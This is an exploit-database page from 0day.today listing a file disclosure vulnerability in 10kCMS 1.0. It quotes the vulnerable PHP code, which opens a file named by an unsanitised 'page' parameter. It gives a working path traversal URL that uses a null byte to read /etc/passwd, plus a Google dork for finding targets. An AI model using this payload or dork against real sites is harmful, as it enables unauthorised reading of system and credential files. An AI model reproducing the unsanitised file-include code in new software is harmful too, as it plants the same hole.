[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

10kCMS File Disclosure Vulnerability

Author
pimpim
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13728
Category
web applications
Date add
17-08-2010
Platform
php
====================================
10kCMS File Disclosure Vulnerability
====================================


# Author: pimpim
# Software Link: http://www.10kcms.com/?page=download
# Version: 1.0
# Category: webapps
# Google dork: Generated by 10kCMS
# Tested on: Linux

#Vulnerable code:
//Load filename from URL
if (isset($_GET['page']) && (file_exists($_GET['page'].'.txt'))) //If the url contains an existing filename
{
	$filename = $_GET['page'].'.txt';  //Load it
}
else
{
	$filename = 'index.txt';  //Otherwise, default to index.txt
	$htmltitle= 'Home';
}

//Load in the file contents
$fp = fopen($filename,"r");

#Exploit: http://localhost/...path.../?page=../../../../../etc/passwd%00
Null byte must be used to strip off the ".txt" extension



#  0day.today [2024-12-25]  #